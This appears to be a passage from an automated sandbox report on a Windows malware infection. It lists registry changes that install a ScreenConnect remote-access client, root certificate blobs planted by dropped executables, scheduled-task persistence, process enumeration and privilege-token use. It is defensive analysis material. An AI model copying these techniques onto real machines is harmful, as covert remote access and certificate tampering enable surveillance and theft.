Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-3be09d9e5e840c20\shell\open C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-3be09d9e5e840c20\shell\open\command C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{6FF59A85-BC37-4CD4-A613-D378E3178387} C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\SourceList\Net C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\SourceList\Media C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\sc-3be09d9e5e840c20 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\sc-3be09d9e5e840c20\URL Protocol C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\PackageCode = "F371D3396946D7F0354CFF6462B809A1" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\Version = "402915332" C:\Windows\system32\msiexec.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\Clients = 3a0000000000 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-3be09d9e5e840c20 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-A613-D378E3178387}\InprocServer32\ = "C:\\Program Files (x86)\\ScreenConnect Client (3be09d9e5e840c20)\\ScreenConnect.WindowsCredentialProvider.dll" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\F371D3396946D7F0354CFF6462B809A1 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\ProductName = "ScreenConnect Client (3be09d9e5e840c20)" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\Language = "1033" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\ProductIcon = "C:\\Windows\\Installer\\{933D173F-6496-0F7D-53C4-FF46268B901A}\\DefaultIcon" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\DeploymentFlags = "3" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\Assignment = "1" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\AdvertiseFlags = "388" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\ScreenConnect\\24.4.4.9118\\3be09d9e5e840c20\\" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-A613-D378E3178387}\InprocServer32\ThreadingModel = "Apartment" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\E4BCFB79704FF87AB30ED9E9E548C002 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\SourceList C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\SourceList\Media\1 = ";" C:\Windows\system32\msiexec.exe N/A

Modifies system certificate store

defense_evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25190000000100000010000000ba4f3972e7aed9dccdc210db59da13c92000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10003000101\57028ffad4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10003000101\57028ffad4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10003000101\57028ffad4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10003000101\57028ffad4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10008470101\E3WGlpL.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\10022320101\67e0HNq.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeImpersonatePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
